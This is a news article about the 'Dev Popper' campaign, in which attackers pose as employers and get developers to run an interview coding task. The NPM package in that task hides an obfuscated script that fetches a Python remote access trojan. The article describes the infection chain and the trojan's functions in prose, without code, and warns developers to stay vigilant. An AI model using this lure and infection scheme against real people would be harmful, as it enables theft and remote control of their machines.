Dev Popper, a new threat campaign that targets software devs

A newly discovered cybercriminal operation identified as “Dev Popper” has emerged, targeting software developers with fraudulent job interviews, intending to trick them into installing a Python remote access trojan (RAT).

These deceptive interviews lure developers into executing tasks under the guise of the interview process, such as fetching and executing code from GitHub, to create an illusion of authenticity. Moreover, the primary objective of the threat actors is to persuade their targets to download hostile software that not only collects system data but also grants remote access to the host computer.

 

The new Dev Popper campaign has a multi-stage infection tactic.

 

The cyberattack orchestrated by the Dev Popper operators involves a multi-phase infection mechanism rooted in social engineering, meticulously crafted to ensnare victims through progressive compromise.

The perpetrators initiate communication by assuming employers’ identities and seeking to fill vacancies for software developers. During the simulated interviews, the attackers will instruct the candidates to retrieve and execute what is portrayed as a standard coding assignment from a GitHub repository.

This assignment is housed within a ZIP archive containing an NPM package, alongside a README.md and directories for frontend and backend components.

Upon executing the NPM package, the developer activates a concealed, obfuscated JavaScript file named “imageDetails.js” within the backend directory. This script utilises ‘curl’ commands via the Node.js process to fetch an additional archive (“p.zi”) from an external server.

In addition, within this archive lies the subsequent payload—a cloaked Python script (“npl”) serving as a RAT. Once the victim’s system is operational, the RAT begins harvesting and transmitting basic system information to a command-and-control (C2) server, containing details like OS type, hostname, and network data.

According to investigations, the RAT boasts several functionalities, including maintaining persistent connections for ongoing control, executing file system commands to pilfer specific data, facilitating remote command execution for further exploits or malware dissemination, conducting direct FTP data exfiltration from pertinent directories like ‘Documents’ and ‘Downloads,’ as well as logging clipboard content and keystrokes to monitor user activity and potentially capture credentials.

While the identities of the perpetrators behind the Dev Popper attack remain undisclosed, leveraging fake job opportunities to distribute malware persists, emphasising the importance of vigilance among individuals.

Authorities warn everyone about threat actors that capitalise on developers’ professional commitment and trust in the job application process. Therefore, software developers should be cautious about picking an employer for potential opportunities.